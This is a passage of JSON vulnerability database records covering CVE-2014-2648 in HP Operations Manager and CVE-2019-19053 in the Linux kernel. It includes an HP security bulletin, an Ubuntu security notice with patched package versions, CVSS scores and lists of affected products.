                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:hp:operations_manager:9.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:hp:operations_manager:9.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-2648"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The vendor reported this issue.",
    "sources": [
      {
        "db": "BID",
        "id": "70350"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2014-2648",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2014-2648",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 1.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2014-2648",
            "trust": 1.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201410-190",
            "trust": 0.6,
            "value": "CRITICAL"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004642"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-190"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2648"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Unspecified vulnerability in HP Operations Manager 9.10 and 9.11 on UNIX allows remote attackers to execute arbitrary code via unknown vectors. \nAttackers can exploit this issue to execute arbitrary code in the context of the affected application. \nFew technical details are currently available. We will update this BID as more information emerges. \nHP Operations Manager 9.10 and 9.11 for UNIX are vulnerable. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04472866\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04472866\nVersion: 1\n\nHPSBMU03127 rev.1 - HP Operations Manager for UNIX, Remote Code Execution\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nReferences: CVE-2014-2648, CVE-2014-2649 (SSRT101727)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The updates can be downloaded\nfrom HP Software Support Online (SSO). \n\n9.11.120 server patches:  Component\n Download Location\n\nOMHPUX_00004\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01188205\n\nITOSOL_00802\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01187924\n\nOML_00080\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01187666\n\n9.11.120 Java UI patches:  Component\n Download Location\n\nOMHPUX_00005\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01187192\n\nITOSOL_00803\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01187435\n\nOML_00081\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01188103\n\n9.20.300 server patches:  Component\n Download Location\n\nOMHPUX_00006\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01188207\n\nITOSOL_00804\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01188065\n\nOML_00082\n https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse\narch/document/KM01188209\n\nHISTORY\nVersion:1 (rev.1) - 8 October 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel.  For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.13 (GNU/Linux)\n\niEYEARECAAYFAlQ1TwsACgkQ4B86/C0qfVnkJgCfevd5vzwuHkW/C2VigZXMkDx3\nemMAoPo5hL+fb0wuvT/65VDTrqjXDEY1\n=TbvC\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-2648"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004642"
      },
      {
        "db": "BID",
        "id": "70350"
      },
      {
        "db": "PACKETSTORM",
        "id": "128616"
      }
    ],
    "trust": 1.98
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-2648",
        "trust": 2.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004642",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-190",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "70350",
        "trust": 0.3
      },
      {
        "db": "PACKETSTORM",
        "id": "128616",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "70350"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004642"
      },
      {
        "db": "PACKETSTORM",
        "id": "128616"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-190"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2648"
      }
    ]
  },
  "id": "VAR-201410-1301",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.11111111
  },
  "last_update_date": "2022-05-04T08:57:21.149000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "HPSBMU03127 SSRT101727",
        "trust": 0.8,
        "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04472866"
      },
      {
        "title": "ITOSOL_00802",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51824"
      },
      {
        "title": "OML_00081",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51828"
      },
      {
        "title": "OMHPUX_00004",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51823"
      },
      {
        "title": "ITOSOL_00803",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51827"
      },
      {
        "title": "OML_00082",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51831"
      },
      {
        "title": "OMHPUX_00005",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51826"
      },
      {
        "title": "ITOSOL_00804",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51830"
      },
      {
        "title": "OML_00080",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51825"
      },
      {
        "title": "OMHPUX_00006",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51829"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004642"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-190"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-2648"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04472866"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2648"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2648"
      },
      {
        "trust": 0.3,
        "url": "https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto\u0026cp=1-11-15-28^1745_4000_100__"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
      },
      {
        "trust": 0.1,
        "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2649"
      },
      {
        "trust": 0.1,
        "url": "https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2648"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "70350"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004642"
      },
      {
        "db": "PACKETSTORM",
        "id": "128616"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-190"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2648"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "70350"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004642"
      },
      {
        "db": "PACKETSTORM",
        "id": "128616"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-190"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-2648"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-10-08T00:00:00",
        "db": "BID",
        "id": "70350"
      },
      {
        "date": "2014-10-14T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-004642"
      },
      {
        "date": "2014-10-09T23:54:56",
        "db": "PACKETSTORM",
        "id": "128616"
      },
      {
        "date": "2014-10-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201410-190"
      },
      {
        "date": "2014-10-10T01:55:00",
        "db": "NVD",
        "id": "CVE-2014-2648"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-10-08T00:00:00",
        "db": "BID",
        "id": "70350"
      },
      {
        "date": "2014-10-14T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-004642"
      },
      {
        "date": "2019-10-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201410-190"
      },
      {
        "date": "2019-10-09T23:10:00",
        "db": "NVD",
        "id": "CVE-2014-2648"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-190"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "UNIX Run on  HP Operations Manager Vulnerable to arbitrary code execution",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-004642"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Unknown",
    "sources": [
      {
        "db": "BID",
        "id": "70350"
      }
    ],
    "trust": 0.3
  }
}

var-201911-1406
Vulnerability from variot

A memory leak in the rpmsg_eptdev_write_iter() function in drivers/rpmsg/rpmsg_char.c in the Linux kernel through 5.3.11 allows attackers to cause a denial of service (memory consumption) by triggering copy_from_iter_full() failures, aka CID-bbe692e349e2. Linux Kernel Contains a resource exhaustion vulnerability. Vendors have confirmed this vulnerability CID-bbe692e349e2 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. ========================================================================= Ubuntu Security Notice USN-4300-1 March 16, 2020

linux, linux-aws, linux-gcp, linux-gcp-5.3, linux-gke-5.3, linux-hwe, linux-kvm, linux-oracle, linux-raspi2, linux-raspi2-5.3 vulnerabilities ========================================================================= A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 19.10
  • Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux: Linux kernel - linux-aws: Linux kernel for Amazon Web Services (AWS) systems - linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems - linux-kvm: Linux kernel for cloud environments - linux-oracle: Linux kernel for Oracle Cloud systems - linux-raspi2: Linux kernel for Raspberry Pi 2 - linux-gcp-5.3: Linux kernel for Google Cloud Platform (GCP) systems - linux-gke-5.3: Linux kernel for Google Container Engine (GKE) systems - linux-hwe: Linux hardware enablement (HWE) kernel - linux-raspi2-5.3: Linux kernel for Raspberry Pi 2

Details:

It was discovered that the KVM implementation in the Linux kernel, when paravirtual TLB flushes are enabled in guests, the hypervisor in some situations could miss deferred TLB flushes or otherwise mishandle them. An attacker in a guest VM could use this to expose sensitive information (read memory from another guest VM). (CVE-2019-3016)

Paulo Bonzini discovered that the KVM hypervisor implementation in the Linux kernel could improperly let a nested (level 2) guest access the resources of a parent (level 1) guest in certain situations. An attacker could use this to expose sensitive information. (CVE-2020-2732)

It was discovered that the Afatech AF9005 DVB-T USB device driver in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-18809)

It was discovered that the Intel(R) XL710 Ethernet Controller device driver in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19043)

It was discovered that the RPMSG character device interface in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19053)

It was discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19056)

It was discovered that the Intel(R) Wi-Fi device driver in the Linux kernel device driver in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19058, CVE-2019-19059)

It was discovered that the Serial Peripheral Interface (SPI) driver in the Linux kernel device driver in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19064)

It was discovered that the Brocade BFA Fibre Channel device driver in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19066)

It was discovered that the Realtek RTL8xxx USB Wi-Fi device driver in the Linux kernel did not properly deallocate memory in certain error conditions. (CVE-2019-19068)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 19.10: linux-image-5.3.0-1011-oracle 5.3.0-1011.12 linux-image-5.3.0-1012-kvm 5.3.0-1012.13 linux-image-5.3.0-1013-aws 5.3.0-1013.14 linux-image-5.3.0-1014-gcp 5.3.0-1014.15 linux-image-5.3.0-1019-raspi2 5.3.0-1019.21 linux-image-5.3.0-42-generic 5.3.0-42.34 linux-image-5.3.0-42-generic-lpae 5.3.0-42.34 linux-image-5.3.0-42-lowlatency 5.3.0-42.34 linux-image-5.3.0-42-snapdragon 5.3.0-42.34 linux-image-aws 5.3.0.1013.15 linux-image-gcp 5.3.0.1014.15 linux-image-generic 5.3.0.42.36 linux-image-generic-lpae 5.3.0.42.36 linux-image-gke 5.3.0.1014.15 linux-image-kvm 5.3.0.1012.14 linux-image-lowlatency 5.3.0.42.36 linux-image-oracle 5.3.0.1011.12 linux-image-raspi2 5.3.0.1019.16 linux-image-snapdragon 5.3.0.42.36 linux-image-virtual 5.3.0.42.36

Ubuntu 18.04 LTS: linux-image-5.3.0-1014-gcp 5.3.0-1014.15~18.04.1 linux-image-5.3.0-1014-gke 5.3.0-1014.15~18.04.1 linux-image-5.3.0-1019-raspi2 5.3.0-1019.21~18.04.1 linux-image-5.3.0-42-generic 5.3.0-42.34~18.04.1 linux-image-5.3.0-42-generic-lpae 5.3.0-42.34~18.04.1 linux-image-5.3.0-42-lowlatency 5.3.0-42.34~18.04.1 linux-image-gcp-edge 5.3.0.1014.13 linux-image-generic-hwe-18.04 5.3.0.42.99 linux-image-generic-lpae-hwe-18.04 5.3.0.42.99 linux-image-gke-5.3 5.3.0.1014.4 linux-image-lowlatency-hwe-18.04 5.3.0.42.99 linux-image-raspi2-hwe-18.04 5.3.0.1019.8 linux-image-snapdragon-hwe-18.04 5.3.0.42.99 linux-image-virtual-hwe-18.04 5.3.0.42.99

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://usn.ubuntu.com/4300-1 CVE-2019-18809, CVE-2019-19043, CVE-2019-19053, CVE-2019-19056, CVE-2019-19058, CVE-2019-19059, CVE-2019-19064, CVE-2019-19066, CVE-2019-19068, CVE-2019-3016, CVE-2020-2732

Package Information: https://launchpad.net/ubuntu/+source/linux/5.3.0-42.34 https://launchpad.net/ubuntu/+source/linux-aws/5.3.0-1013.14 https://launchpad.net/ubuntu/+source/linux-gcp/5.3.0-1014.15 https://launchpad.net/ubuntu/+source/linux-kvm/5.3.0-1012.13 https://launchpad.net/ubuntu/+source/linux-oracle/5.3.0-1011.12 https://launchpad.net/ubuntu/+source/linux-raspi2/5.3.0-1019.21 https://launchpad.net/ubuntu/+source/linux-gcp-5.3/5.3.0-1014.15~18.04.1 https://launchpad.net/ubuntu/+source/linux-gke-5.3/5.3.0-1014.15~18.04.1 https://launchpad.net/ubuntu/+source/linux-hwe/5.3.0-42.34~18.04.1 https://launchpad.net/ubuntu/+source/linux-raspi2-5.3/5.3.0-1019.21~18.04.1

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201911-1406",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "data availability services",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.40"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.40.5"
      },
      {
        "model": "hci compute node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "hci baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "h610s"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.50.1"
      },
      {
        "model": "steelstore cloud integrated storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4.12"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.3"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.30"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.25"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.0"
      },
      {
        "model": "aff baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.40.3r2"
      },
      {
        "model": "active iq unified manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.60.1"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "18.04"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.0"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.70.2"
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "solidfire \\\u0026 hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "brocade fabric operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "broadcom",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.70.1"
      },
      {
        "model": "solidfire\\, enterprise sds \\\u0026 hci storage node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.20"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "19.10"
      },
      {
        "model": "fas\\/aff baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.0.0"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.30.5r3"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "e-series santricity os controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": "11.50.2"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "linux",
        "version": "5.3.11"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012045"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19053"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.4.12",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
